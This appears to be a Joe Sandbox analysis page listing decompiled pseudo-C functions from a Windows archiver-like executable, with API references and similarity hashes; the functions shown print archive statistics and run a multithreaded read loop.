                                                                                                                    Function 00B4C11E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00B4C11E(void* __ecx, void* __edi) {
				void* _t47;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				void* _t67;

				_t61 = __edi;
				L00B7F140(E00B86900, _t67);
				_t65 = __ecx;
				_t47 = __ecx + 8;
				if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
					E00B4B618(_t47, __edi, 1);
				}
				if( *(_t65 + 0xb8) != 0) {
					_push(_t61);
					E00B126D9(_t67 - 0x18);
					 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
					asm("sbb ecx, [esi+0x11c]");
					E00B4C208(_t67 - 0x18, "Files read from disk",  *((intOrPtr*)(_t65 + 0x18)) -  *((intOrPtr*)(_t65 + 0x118)),  *((intOrPtr*)(_t65 + 0x1c)));
					E00B1287D();
					E00B12895(_t67 - 0x18, "Archive size: ");
					_t62 =  *((intOrPtr*)(_t67 + 8));
					E00B443B9(_t67 - 0x18,  *_t62,  *((intOrPtr*)(_t62 + 4)));
					E00B1287D();
					_t75 =  *((char*)(_t62 + 0xc));
					if( *((char*)(_t62 + 0xc)) != 0) {
						E00B12895(_t67 - 0x18, "Volumes: ");
						E00B1291C(_t67 - 0x18, _t62, _t67, _t75,  *((intOrPtr*)(_t62 + 8)));
						E00B1287D();
					}
					E00B11FE9( *(_t65 + 0xb8));
					E00B11E89(fputs( *(_t67 - 0x18),  *( *(_t65 + 0xb8))),  *(_t67 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return 0;
			}








                                                                                                                    0x00b4c11e
                                                                                                                    0x00b4c123
                                                                                                                    0x00b4c12c
                                                                                                                    0x00b4c135
                                                                                                                    0x00b4c138
                                                                                                                    0x00b4c13c
                                                                                                                    0x00b4c13c
                                                                                                                    0x00b4c148
                                                                                                                    0x00b4c14e
                                                                                                                    0x00b4c152
                                                                                                                    0x00b4c15a
                                                                                                                    0x00b4c16c
                                                                                                                    0x00b4c177
                                                                                                                    0x00b4c17f
                                                                                                                    0x00b4c18c
                                                                                                                    0x00b4c191
                                                                                                                    0x00b4c19c
                                                                                                                    0x00b4c1a4
                                                                                                                    0x00b4c1a9
                                                                                                                    0x00b4c1ad
                                                                                                                    0x00b4c1b7
                                                                                                                    0x00b4c1c2
                                                                                                                    0x00b4c1ca
                                                                                                                    0x00b4c1ca
                                                                                                                    0x00b4c1d5
                                                                                                                    0x00b4c1ee
                                                                                                                    0x00b4c1f6
                                                                                                                    0x00b4c1fd
                                                                                                                    0x00b4c205

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: Archive size: $Files read from disk$Volumes:
                                                                                                                    • API String ID: 2614055831-73833580
                                                                                                                    • Opcode ID: 8eaed68070ad9cc29b9ca3a655184899043c5e3cfe71804fd9a6441fd47c2a74
                                                                                                                    • Instruction ID: ecb524444942772e0ca2d743bfc58ae18f42df09cf6fd17ddb99166c2a4f8c6a
                                                                                                                    • Opcode Fuzzy Hash: 8eaed68070ad9cc29b9ca3a655184899043c5e3cfe71804fd9a6441fd47c2a74
                                                                                                                    • Instruction Fuzzy Hash: B2215332900205DBCB14EFA4C857FEEBBF5EF54700F4045A9A116661F1DF70AA99DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4A711 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B4A711(intOrPtr* __ecx, struct _IO_FILE** __edx) {
				void* _t18;
				void* _t25;
				struct _IO_FILE** _t28;
				signed int _t45;
				intOrPtr* _t48;
				void* _t50;

				L00B7F140(E00B866AC, _t50);
				_t48 = __ecx;
				_t45 = 0;
				_t28 = __edx;
				_t55 =  *((intOrPtr*)(__ecx + 4));
				if( *((intOrPtr*)(__ecx + 4)) > 0) {
					do {
						E00B12155( *((intOrPtr*)( *__ecx + _t45 * 4)));
						fputs(" : ",  *__edx);
						_push( *((intOrPtr*)(L00B155C8(_t50 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + _t45 * 4)), _t55))));
						 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
						_t25 = E00B11FE9(L00B11FFC(_t28, _t55));
						 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
						E00B11E89(_t25,  *((intOrPtr*)(_t50 - 0x18)));
						_t45 = _t45 + 1;
					} while (_t45 <  *((intOrPtr*)(_t48 + 4)));
				}
				fputs("----------------",  *_t28);
				_t18 = E00B11FE9(_t28);
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t18;
			}









                                                                                                                    0x00b4a716
                                                                                                                    0x00b4a721
                                                                                                                    0x00b4a723
                                                                                                                    0x00b4a725
                                                                                                                    0x00b4a727
                                                                                                                    0x00b4a72a
                                                                                                                    0x00b4a72c
                                                                                                                    0x00b4a733
                                                                                                                    0x00b4a73f
                                                                                                                    0x00b4a755
                                                                                                                    0x00b4a757
                                                                                                                    0x00b4a764
                                                                                                                    0x00b4a769
                                                                                                                    0x00b4a770
                                                                                                                    0x00b4a775
                                                                                                                    0x00b4a777
                                                                                                                    0x00b4a72c
                                                                                                                    0x00b4a783
                                                                                                                    0x00b4a78d
                                                                                                                    0x00b4a798
                                                                                                                    0x00b4a7a0

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4A716
                                                                                                                    • fputs.MSVCRT ref: 00B4A73F
                                                                                                                      • Part of subcall function 00B155C8: __EH_prolog.LIBCMT ref: 00B155CD
                                                                                                                      • Part of subcall function 00B11FFC: __EH_prolog.LIBCMT ref: 00B12001
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    • fputs.MSVCRT ref: 00B4A783
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$fputs$fputcfree
                                                                                                                    • String ID: : $----------------
                                                                                                                    • API String ID: 1877784702-4071417161
                                                                                                                    • Opcode ID: 65a2b7eb35b0ab08a4fed26acb7514ab03656d1f5a8c82585b5f3d7ddfc490b5
                                                                                                                    • Instruction ID: 60987a4125755a659d15f7326d4ac345c7b9440b4ca00051b88b23e11b1628ec
                                                                                                                    • Opcode Fuzzy Hash: 65a2b7eb35b0ab08a4fed26acb7514ab03656d1f5a8c82585b5f3d7ddfc490b5
                                                                                                                    • Instruction Fuzzy Hash: 28016136604201EFCB14BFA8D846AADBBF6EB84351B1045BDE112972E1DF31A945CB15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4C247 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00B4C247(void* __ecx, void* __edx) {
				struct _IO_FILE** _t16;
				void* _t41;
				void* _t44;

				L00B7F140(E00B86914, _t44);
				_t41 = __ecx;
				_t16 =  *(__ecx + 0xb8);
				_t49 = _t16;
				if(_t16 != 0) {
					fputs("Write SFX: ",  *_t16);
					_push( *((intOrPtr*)(_t44 + 8)));
					L00B11FFC( *(_t41 + 0xb8), _t49);
					E00B126FB(_t44 - 0x18, " : ");
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					E00B443B9(_t44 - 0x18,  *((intOrPtr*)(_t44 + 0xc)),  *((intOrPtr*)(_t44 + 0x10)));
					fputs( *(_t44 - 0x18),  *( *(_t41 + 0xb8)));
					E00B11E89(E00B11FE9( *(_t41 + 0xb8)),  *(_t44 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return 0;
			}






                                                                                                                    0x00b4c24c
                                                                                                                    0x00b4c255
                                                                                                                    0x00b4c257
                                                                                                                    0x00b4c25d
                                                                                                                    0x00b4c25f
                                                                                                                    0x00b4c26f
                                                                                                                    0x00b4c273
                                                                                                                    0x00b4c27c
                                                                                                                    0x00b4c289
                                                                                                                    0x00b4c291
                                                                                                                    0x00b4c29b
                                                                                                                    0x00b4c2ab
                                                                                                                    0x00b4c2b9
                                                                                                                    0x00b4c2bf
                                                                                                                    0x00b4c2c6
                                                                                                                    0x00b4c2ce

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4C24C
                                                                                                                    • fputs.MSVCRT ref: 00B4C26F
                                                                                                                      • Part of subcall function 00B11FFC: __EH_prolog.LIBCMT ref: 00B12001
                                                                                                                    • fputs.MSVCRT ref: 00B4C2AB
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologfputs$fputcfree
                                                                                                                    • String ID: : $Write SFX:
                                                                                                                    • API String ID: 1941438168-2530961540
                                                                                                                    • Opcode ID: 7eb3706b472d20f9907a5e52e99d233d1a011eb06ed5666388b5cadbc6d9d4d4
                                                                                                                    • Instruction ID: ab9fe0daa66fcfe6fb00f53093ab4b16b400f1912fc6dec721c5304a4c5678bd
                                                                                                                    • Opcode Fuzzy Hash: 7eb3706b472d20f9907a5e52e99d233d1a011eb06ed5666388b5cadbc6d9d4d4
                                                                                                                    • Instruction Fuzzy Hash: 4C018432504205AFCF05BFA4D802BEEBBF5EF44710F10446AF505A21B1DF71A955DB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1A088 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00B1A088(void* __ecx) {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __ecx;
				_t1 = GetModuleHandleW(L"ntdll.dll");
				if(_t1 == 0) {
					L2:
					return 0;
				} else {
					_t3 = GetProcAddress(_t1, "RtlGetVersion");
					if(_t3 != 0) {
						 *_t3(_t7);
						_t5 = 1;
						return _t5;
					} else {
						goto L2;
					}
				}
			}







                                                                                                                    0x00b1a089
                                                                                                                    0x00b1a090
                                                                                                                    0x00b1a098
                                                                                                                    0x00b1a0aa
                                                                                                                    0x00b1a0ad
                                                                                                                    0x00b1a09a
                                                                                                                    0x00b1a0a0
                                                                                                                    0x00b1a0a8
                                                                                                                    0x00b1a0af
                                                                                                                    0x00b1a0b3
                                                                                                                    0x00b1a0b5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1a0a8

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,00B19F84,00000001), ref: 00B1A090
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00B1A0A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: RtlGetVersion$ntdll.dll$N)w
                                                                                                                    • API String ID: 1646373207-151850887
                                                                                                                    • Opcode ID: 43bc68f25b40da3d86eff5bd92d6e94a2b3fa02e046a427e8904d767ac843b2e
                                                                                                                    • Instruction ID: f7748242bb3d3e6b463e76a91d368f3c6555623afc76989ea200e656c3ffeb72
                                                                                                                    • Opcode Fuzzy Hash: 43bc68f25b40da3d86eff5bd92d6e94a2b3fa02e046a427e8904d767ac843b2e
                                                                                                                    • Instruction Fuzzy Hash: 5CD0A73135932139AE2076B47C0EAF622CCDB54B11B090491B401D20B0DEC0DD81C362
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B763F0 Relevance: 7.8, APIs: 6, Instructions: 301COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B763F0(void* __eflags) {
				signed int _t140;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int* _t151;
				signed int _t153;
				signed int _t155;
				signed int* _t161;
				intOrPtr _t167;
				signed int _t172;
				intOrPtr _t178;
				signed int _t183;
				intOrPtr _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t204;
				intOrPtr _t212;
				intOrPtr _t215;
				intOrPtr _t225;
				signed int _t234;
				struct _CRITICAL_SECTION* _t235;
				intOrPtr* _t237;
				signed int _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t242;
				void* _t268;

				_t189 =  *(_t242 + 0x28);
				_t237 =  *_t189;
				_t238 = 0;
				 *((intOrPtr*)(_t242 + 0x2c)) = 0;
				 *((intOrPtr*)(_t242 + 0x1c)) = _t237 + 0x30;
				if(L00B77D90( *((intOrPtr*)(_t237 + 0x30))) != 0) {
					L68:
					return 0xc;
				} else {
					while( *(_t237 + 0x38) == 0) {
						_t234 = E00B76CA0(_t237 + 0x208);
						 *((intOrPtr*)(_t242 + 0x14)) = 0;
						 *((intOrPtr*)(_t242 + 0x24)) = 0;
						 *(_t242 + 0x10) = 1;
						if(_t234 == 0) {
							_t212 =  *_t237;
							 *((intOrPtr*)(_t242 + 0x14)) = _t212;
							if( *((intOrPtr*)(_t237 + 0x10)) == 0) {
								_t189 =  *(_t237 + 0x18);
								_t240 =  *((intOrPtr*)(_t237 + 0xb0));
								_t225 =  *((intOrPtr*)(_t237 + 0xb4));
								_t178 = _t189 - _t240;
								if(_t212 > _t178) {
									_t212 = _t178;
									 *((intOrPtr*)(_t242 + 0x14)) = _t212;
								}
								_t238 = _t240 + _t212;
								asm("adc edx, 0x0");
								 *((intOrPtr*)(_t242 + 0x24)) =  *((intOrPtr*)(_t237 + 0x14)) + _t240;
								 *((intOrPtr*)(_t242 + 0x2c)) = _t225;
								 *((intOrPtr*)(_t237 + 0xb0)) = _t238;
								 *((intOrPtr*)(_t237 + 0xb4)) = _t225;
								 *(_t242 + 0x10) = 0 | _t189 == _t238;
							} else {
								if( *((intOrPtr*)(_t189 + 0xc)) != 0) {
									L9:
									_t183 = L00B6B020( *((intOrPtr*)(_t237 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)), _t242 + 0x14);
									_t215 =  *((intOrPtr*)(_t242 + 0x14));
									_t234 = _t183;
									_t238 = _t215 +  *((intOrPtr*)(_t237 + 0xb0));
									asm("adc eax, [esi+0xb4]");
									 *((intOrPtr*)(_t237 + 0xb0)) = _t238;
									 *((intOrPtr*)(_t242 + 0x2c)) = 0;
									 *((intOrPtr*)(_t237 + 0xb4)) = 0;
									if(_t234 == 0) {
										 *(_t242 + 0x10) = 0 | _t215 !=  *_t237;
									} else {
										goto L10;
									}
								} else {
									_t188 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x20))))))();
									 *((intOrPtr*)(_t189 + 0xc)) = _t188;
									if(_t188 != 0) {
										goto L9;
									} else {
										_t17 = _t188 + 2; // 0x2
										_t234 = _t17;
										L10:
										 *(_t237 + 0x3c) = _t234;
										E00B76CC0(_t237 + 0x208, _t234);
									}
								}
							}
						}
						 *(_t242 + 0x20) = 0;
						if(L00B77D90( *((intOrPtr*)(_t237 + 0x34))) != 0) {
							 *(_t242 + 0x20) = 0xc;
							if(_t234 == 0) {
								_t234 = 0xc;
							}
						}
						_t146 =  *(_t237 + 0xa8);
						 *(_t242 + 0x18) = _t146;
						_t147 = _t146 + 1;
						 *(_t237 + 0xa8) = _t147;
						if(_t147 >=  *((intOrPtr*)(_t237 + 0xa4))) {
							 *(_t237 + 0xa8) = 0;
						}
						_t190 = _t189 | 0xffffffff;
						if(_t234 != 0) {
							L29:
							 *(_t242 + 0x10) = 1;
							goto L30;
						} else {
							_t172 = E00B76CA0(_t237 + 0x208);
							_t234 = _t172;
							if(_t234 != 0) {
								goto L29;
							} else {
								if( *(_t242 + 0x10) != _t172) {
									L30:
									 *(_t237 + 0x38) = 1;
								} else {
									_t173 =  *(_t237 + 0xa0);
									if( *(_t237 + 0xa0) <  *((intOrPtr*)(_t237 + 0x9c)) && ( *((intOrPtr*)(_t237 + 8)) != _t238 ||  *((intOrPtr*)(_t237 + 0xc)) !=  *((intOrPtr*)(_t242 + 0x2c)))) {
										_t234 = E00B76990(_t237 + 0x5c8 + (_t173 + _t173 * 2) * 8);
										if(_t234 != 0) {
											E00B76CC0(_t237 + 0x208, _t234);
											goto L29;
										} else {
											 *(_t237 + 0xa0) =  *(_t237 + 0xa0) + 1;
										}
									}
								}
							}
						}
						if(L00B77EB0( *((intOrPtr*)(_t242 + 0x1c))) != 0) {
							goto L68;
						} else {
							_t149 =  *(_t242 + 0x20);
							if(_t149 != 0) {
								return _t149;
							} else {
								if(_t234 == 0) {
									_t235 = _t237 + 0xb8;
									EnterCriticalSection(_t235);
									_t190 =  *(_t237 + 0xd0);
									 *(_t237 + 0xd0) =  *(_t237 + 0xd4 + _t190 * 4);
									LeaveCriticalSection(_t235);
									if( *((intOrPtr*)(_t237 + 0x10)) == 0) {
										_t167 =  *((intOrPtr*)(_t242 + 0x24));
									} else {
										_t167 =  *((intOrPtr*)( *(_t242 + 0x34) + 0xc));
									}
									_t234 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x24))))))(_t190, _t167,  *((intOrPtr*)(_t242 + 0x14)),  *(_t242 + 0x10));
									if(_t234 != 0) {
										E00B76CC0(_t237 + 0x208, _t234);
									}
								}
								_t151 = _t237 + 0x238 + ( *(_t242 + 0x18) +  *(_t242 + 0x18) * 2) * 4;
								 *_t151 = _t234;
								_t151[1] = _t190;
								_t151[2] =  *(_t242 + 0x10);
								EnterCriticalSection(_t237 + 0xb8);
								_t239 =  *(_t237 + 0x48);
								_t153 =  *(_t242 + 0x18);
								if(_t239 != _t153) {
									 *((char*)(_t153 + _t237 + 0x4c)) = 1;
								} else {
									 *(_t237 + 0x48) = 0xffffffff;
								}
								LeaveCriticalSection(_t237 + 0xb8);
								if(_t239 ==  *(_t242 + 0x18)) {
									_t155 =  *(_t237 + 0x44);
									if(_t155 != 0) {
										_t234 = _t155;
									}
									L47:
									L47:
									if(_t234 == 0 && _t190 != 0xffffffff) {
										_t234 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x24)) + 4))))();
										if(_t234 != 0) {
											 *(_t237 + 0x44) = _t234;
											E00B76CC0(_t237 + 0x208, _t234);
										}
									}
									_t239 = _t239 + 1;
									if(_t239 >=  *((intOrPtr*)(_t237 + 0xa4))) {
										_t239 = 0;
									}
									EnterCriticalSection(_t237 + 0xb8);
									if(_t190 != 0xffffffff) {
										 *(_t237 + 0xd4 + _t190 * 4) =  *(_t237 + 0xd0);
										 *(_t237 + 0xd0) = _t190;
									}
									_t191 =  *(_t237 + _t239 + 0x4c) & 0x000000ff;
									if(_t191 == 0) {
										 *(_t237 + 0x48) = _t239;
									} else {
										 *(_t237 + _t239 + 0x4c) = 0;
									}
									LeaveCriticalSection(_t237 + 0xb8);
									if(L00B77FE0(_t237 + 0x34) != 0) {
										goto L68;
									}
									if(_t191 == 0) {
										if( *(_t242 + 0x10) != 0) {
											goto L70;
										}
										goto L66;
									} else {
										_t161 = _t237 + 0x238 + (_t239 + _t239 * 2) * 4;
										if(_t234 == 0) {
											_t204 =  *_t161;
											if(_t204 != 0) {
												_t234 = _t204;
											}
										}
										_t190 = _t161[1];
										 *(_t242 + 0x10) = _t161[2];
										goto L47;
									}
								} else {
									if(_t234 != 0) {
										L70:
										return 0;
									}
									_t268 =  *(_t242 + 0x10) - _t234;
									L66:
									if(_t268 != 0) {
										goto L70;
									}
									_t238 = 0;
									 *((intOrPtr*)(_t242 + 0x2c)) = 0;
									if(L00B77D90( *((intOrPtr*)( *((intOrPtr*)(_t242 + 0x1c))))) == 0) {
										_t189 =  *(_t242 + 0x34);
										continue;
									} else {
										goto L68;
									}
								}
							}
						}
						goto L72;
					}
					_t140 = L00B77EB0( *((intOrPtr*)(_t242 + 0x1c)));
					asm("sbb eax, eax");
					return  ~_t140 & 0x0000000c;
				}
				L72:
			}































                                                                                                                    0x00b763f4
                                                                                                                    0x00b763fa
                                                                                                                    0x00b76402
                                                                                                                    0x00b76405
                                                                                                                    0x00b76409
                                                                                                                    0x00b76414
                                                                                                                    0x00b767a9
                                                                                                                    0x00b767b2
                                                                                                                    0x00b7641a
                                                                                                                    0x00b76424
                                                                                                                    0x00b76439
                                                                                                                    0x00b7643d
                                                                                                                    0x00b76441
                                                                                                                    0x00b76445
                                                                                                                    0x00b7644f
                                                                                                                    0x00b76455
                                                                                                                    0x00b76457
                                                                                                                    0x00b7645e
                                                                                                                    0x00b764d5
                                                                                                                    0x00b764d8
                                                                                                                    0x00b764de
                                                                                                                    0x00b764e6
                                                                                                                    0x00b764ea
                                                                                                                    0x00b764ec
                                                                                                                    0x00b764ee
                                                                                                                    0x00b764ee
                                                                                                                    0x00b764f7
                                                                                                                    0x00b764f9
                                                                                                                    0x00b764fc
                                                                                                                    0x00b76507
                                                                                                                    0x00b7650b
                                                                                                                    0x00b76511
                                                                                                                    0x00b76517
                                                                                                                    0x00b76460
                                                                                                                    0x00b76463
                                                                                                                    0x00b7647c
                                                                                                                    0x00b76487
                                                                                                                    0x00b7648c
                                                                                                                    0x00b76490
                                                                                                                    0x00b76496
                                                                                                                    0x00b7649c
                                                                                                                    0x00b764a2
                                                                                                                    0x00b764a8
                                                                                                                    0x00b764ac
                                                                                                                    0x00b764b4
                                                                                                                    0x00b764cf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b76465
                                                                                                                    0x00b7646e
                                                                                                                    0x00b76470
                                                                                                                    0x00b76475
                                                                                                                    0x00000000
                                                                                                                    0x00b76477
                                                                                                                    0x00b76477
                                                                                                                    0x00b76477
                                                                                                                    0x00b764b6
                                                                                                                    0x00b764be
                                                                                                                    0x00b764c1
                                                                                                                    0x00b764c1
                                                                                                                    0x00b76475
                                                                                                                    0x00b76463
                                                                                                                    0x00b7645e
                                                                                                                    0x00b7651e
                                                                                                                    0x00b7652d
                                                                                                                    0x00b7652f
                                                                                                                    0x00b76539
                                                                                                                    0x00b7653b
                                                                                                                    0x00b7653b
                                                                                                                    0x00b76539
                                                                                                                    0x00b76540
                                                                                                                    0x00b76546
                                                                                                                    0x00b7654a
                                                                                                                    0x00b7654b
                                                                                                                    0x00b76557
                                                                                                                    0x00b76559
                                                                                                                    0x00b76559
                                                                                                                    0x00b76563
                                                                                                                    0x00b76568
                                                                                                                    0x00b765c7
                                                                                                                    0x00b765c7
                                                                                                                    0x00000000
                                                                                                                    0x00b7656a
                                                                                                                    0x00b76570
                                                                                                                    0x00b76575
                                                                                                                    0x00b76579
                                                                                                                    0x00000000
                                                                                                                    0x00b7657b
                                                                                                                    0x00b7657f
                                                                                                                    0x00b765cf
                                                                                                                    0x00b765cf
                                                                                                                    0x00b76581
                                                                                                                    0x00b76581
                                                                                                                    0x00b7658d
                                                                                                                    0x00b765ac
                                                                                                                    0x00b765b0
                                                                                                                    0x00b765c2
                                                                                                                    0x00000000
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b0
                                                                                                                    0x00b7658d
                                                                                                                    0x00b7657f
                                                                                                                    0x00b76579
                                                                                                                    0x00b765e1
                                                                                                                    0x00000000
                                                                                                                    0x00b765e7
                                                                                                                    0x00b765e7
                                                                                                                    0x00b765ed
                                                                                                                    0x00b767d8
                                                                                                                    0x00b765f3
                                                                                                                    0x00b765f5
                                                                                                                    0x00b765f7
                                                                                                                    0x00b765fe
                                                                                                                    0x00b76604
                                                                                                                    0x00b76612
                                                                                                                    0x00b76618
                                                                                                                    0x00b76622
                                                                                                                    0x00b7662d
                                                                                                                    0x00b76624
                                                                                                                    0x00b76628
                                                                                                                    0x00b76628
                                                                                                                    0x00b7664e
                                                                                                                    0x00b76652
                                                                                                                    0x00b7665c
                                                                                                                    0x00b7665c
                                                                                                                    0x00b76652
                                                                                                                    0x00b7666c
                                                                                                                    0x00b76673
                                                                                                                    0x00b76675
                                                                                                                    0x00b76678
                                                                                                                    0x00b76682
                                                                                                                    0x00b76688
                                                                                                                    0x00b7668b
                                                                                                                    0x00b76691
                                                                                                                    0x00b7669c
                                                                                                                    0x00b76693
                                                                                                                    0x00b76693
                                                                                                                    0x00b76693
                                                                                                                    0x00b766a8
                                                                                                                    0x00b766b2
                                                                                                                    0x00b766c5
                                                                                                                    0x00b766ca
                                                                                                                    0x00b766cc
                                                                                                                    0x00b766cc
                                                                                                                    0x00000000
                                                                                                                    0x00b766d0
                                                                                                                    0x00b766d2
                                                                                                                    0x00b766e6
                                                                                                                    0x00b766ea
                                                                                                                    0x00b766f4
                                                                                                                    0x00b766f7
                                                                                                                    0x00b766f7
                                                                                                                    0x00b766ea
                                                                                                                    0x00b766fc
                                                                                                                    0x00b76703
                                                                                                                    0x00b76705
                                                                                                                    0x00b76705
                                                                                                                    0x00b7670e
                                                                                                                    0x00b76717
                                                                                                                    0x00b7671f
                                                                                                                    0x00b76726
                                                                                                                    0x00b76726
                                                                                                                    0x00b7672c
                                                                                                                    0x00b76733
                                                                                                                    0x00b7673c
                                                                                                                    0x00b76735
                                                                                                                    0x00b76735
                                                                                                                    0x00b76735
                                                                                                                    0x00b76746
                                                                                                                    0x00b76756
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7675a
                                                                                                                    0x00b76787
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7675c
                                                                                                                    0x00b76760
                                                                                                                    0x00b76769
                                                                                                                    0x00b7676b
                                                                                                                    0x00b7676f
                                                                                                                    0x00b76771
                                                                                                                    0x00b76771
                                                                                                                    0x00b7676f
                                                                                                                    0x00b76773
                                                                                                                    0x00b76779
                                                                                                                    0x00000000
                                                                                                                    0x00b76779
                                                                                                                    0x00b766b4
                                                                                                                    0x00b766b6
                                                                                                                    0x00b767cf
                                                                                                                    0x00000000
                                                                                                                    0x00b767cf
                                                                                                                    0x00b766bc
